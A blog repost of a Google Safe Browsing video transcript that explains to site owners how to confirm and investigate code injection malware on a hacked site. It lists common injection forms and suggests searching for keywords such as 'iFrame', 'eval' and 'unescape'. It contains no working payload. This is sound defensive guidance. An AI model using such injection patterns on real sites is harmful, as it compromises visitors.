Help for hacked sites: Code injection
Articles,  Blog

Help for hacked sites: Code injection


[MUSIC PLAYING] Hi. I’m Lucas Ballard. I’m a software engineer at
Google, and I work on Google Safe Browsing. I’d like to provide more
information for site owners who are notified that their
site was infected with malware, specifically with
the type code injection. If your site is infected with
malware, you can see sample infected URLs and the type of
the infection when you verify ownership of your site in
Google Webmaster Tools. Google Webmaster Tools
can be found at google.com/webmasters. With regard to the malware
type code injection, this means that pages on your site
were modified to include malicious code. If you’ve verified ownership
of your site in Webmaster Tools, go to the Malware section
and take note of the sample URLs associated
with code injection. Next, try to confirm the code
injection by viewing the source code for these
sample URLs. You can use wget or curl. Just remember, your site will
need to be back online first. Once you have an idea of the
hacker’s injected code through wget or curl, you can further
investigate by logging into the file system. View all files used to generate
the sample URLs. Some examples of malicious code
injections include an iFrame to an attack site,
JavaScript or another scripting language that calls
and run scripts from an attack site, scripting that redirects
the browser to an attack site, and malicious code that’s
obfuscated to avoid detection. To assess the damage caused
by malware injections, investigate all possible
harmful code present on the site. It may be helpful to search
for words like “iFrame” to find iFrame code. Malicious iFrames are
fairly common. Other helpful keywords are
“script” with complicated constructs like eval
and unescape. When you’re ready to clean up
your site, which is a future step in our Hacked Site recovery
process, you can either replace infected files
with the last good backup, or you can remove the code
injection from each page in all related scripting
functions or files. Remember that deleting the
malicious code doesn’t correct the underlying vulnerability
that allowed the hacker to compromise your site
in the first place. To more thoroughly investigate
the hacker’s damage on your entire site, check out file
system damage assessment. Thanks for watching. [MUSIC PLAYING]

4 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *